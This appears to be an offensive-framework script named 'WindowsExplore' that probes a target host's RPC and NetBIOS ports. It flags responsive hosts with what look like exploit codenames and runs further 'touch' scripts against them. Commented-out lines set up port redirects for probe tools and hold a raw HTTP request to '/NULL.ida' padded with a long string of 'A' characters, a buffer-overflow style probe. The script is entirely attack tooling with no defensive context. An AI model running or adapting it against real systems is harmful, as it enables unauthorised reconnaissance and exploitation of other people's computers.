bool $ok = true; string $cmd = ""; string $out = ""; echo "\n\tWindowsExplore"; @echo off; ####################################################################### $cmd = "banner -ip $argv[1] -port 135 -wait 0"; #echo "\n---------- tWindowsExplore : $cmd ----------"; ####################################################################### @record on; $ok = `$cmd`; @record off; @echo on; $out = "\t\t$cmd (rpc) :"; if($ok) {echo"$out * YES ** CRYSTALICE **";} else { echo "$out no";} @echo off; ####################################################################### $cmd = "banner -ip $argv[1] -port 139 -wait 0"; #echo "\n---------- tWindowsExplore : $cmd ----------"; ####################################################################### @record on; $ok = `$cmd`; @record off; @echo on; $out = "\t\t$cmd (NETBIOS-ssn) :"; if($ok) {echo"$out * YES ** FLUKECOPTER **";} else { echo "$out no";} @echo off; $ok = `script "D:\\ET_Development\\Work Area\\Touches\\MachineInfoBox.eps" "$argv[1]"`; @echo on; @echo off; $ok = `script "D:\\ET_Development\\Work Area\\Touches\\NetBiosBox.eps" "$argv[1]"`; @echo on; #if(`loadplugin processplugin`) #{ # $ok = `run -command "net view $argv[1]" -redirect netview_$argv[1]`; #} # if(prompt"Do you wan to enumerate shares on this machine?(audited as a logon attempt)") # { # if(`loadplugin processplugin`) # { # `run -command "net view $argv[1]" -redirect netview_$argv[1]`; # } # } #rpcss touch # `redirect -tcp -lplisten 1350 -target $argv[1] 135`; # echo"Now, use the command prompt to run: regprobe.exe ncacn_ip_tcp 1350"; # echo"Continue once you are done."; # pause; #dd touch # `redirect -tcp -lplisten 8080 -target $argv[1] 80`; # echo"Now, use the command prompt to run: dd.exe -i -p 8080 -u -f 1"; # echo"Continue once you are done."; # pause; # `banner -port 80 -target $argv[1] -send "GET\x20/NULL\x2eida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=B\x20HTTP/1.1\r\n\x48Host:\x20$argv[2]"`; return true;